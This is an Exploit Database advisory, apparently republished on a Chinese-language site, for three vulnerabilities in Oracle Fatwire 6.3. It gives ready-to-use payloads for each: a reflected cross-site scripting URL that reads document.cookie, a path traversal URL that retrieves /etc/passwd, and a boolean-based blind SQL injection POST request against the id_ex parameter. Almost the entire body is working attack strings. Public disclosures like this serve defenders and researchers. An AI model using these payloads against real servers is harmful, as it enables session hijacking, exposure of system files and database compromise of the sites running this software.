Oracle Fatwire 6.3 – Multiple Vulnerabilities

• Exploit Database
• 18 阅读

• 作者： J. Francisco Bolivar
  日期： 2021-07-29
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/50167/

• # Exploit Title: Oracle Fatwire 6.3 - Multiple Vulnerabilities
  # Date: 29/07/2021
  # Exploit Author: J. Francisco Bolivar @Jfran_cbit
  # Vendor Homepage: https://www.oracle.com/index.html
  # Version: 6.3
  # Tested on: CentOS
  
  1. Xss
  
  Adt parameter is vulnerable to Xss:
  
  https://IPADDRESS/cs/Satellite?c=Page&cid=xxxx&pagename=xxxx&adt=<img
  src="https://www.exploit-db.com/exploits/50167/a" onerror=alert(document.cookie);>
  
  2. Path Traversal
  
  https://IPADDRESS/cs/career/getSurvey.jsp?fn=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
  
  3. Blind Sql injection
  
  POST
  /cs/Satellite?cid=xx&pagename=XXXXXXX/elementIncludesestPractice/b/searchBestPractice
  HTTP/1.1
  Host: IPaddress
  
  pillar_bp=&subcategory_bp=&htlcd_bp=&id_ex=<SQL Injection>&command=XX
  
  The vulnerable parameter is : id_ex (POST)
   Type: boolean-based blind
  Title: AND boolean-based blind - WHERE or HAVING clause
  Payload: pillar_bp=&subcategory_bp=&htlcd_bp=&id_ex=203 AND
  3958=3958&command=xxxxxT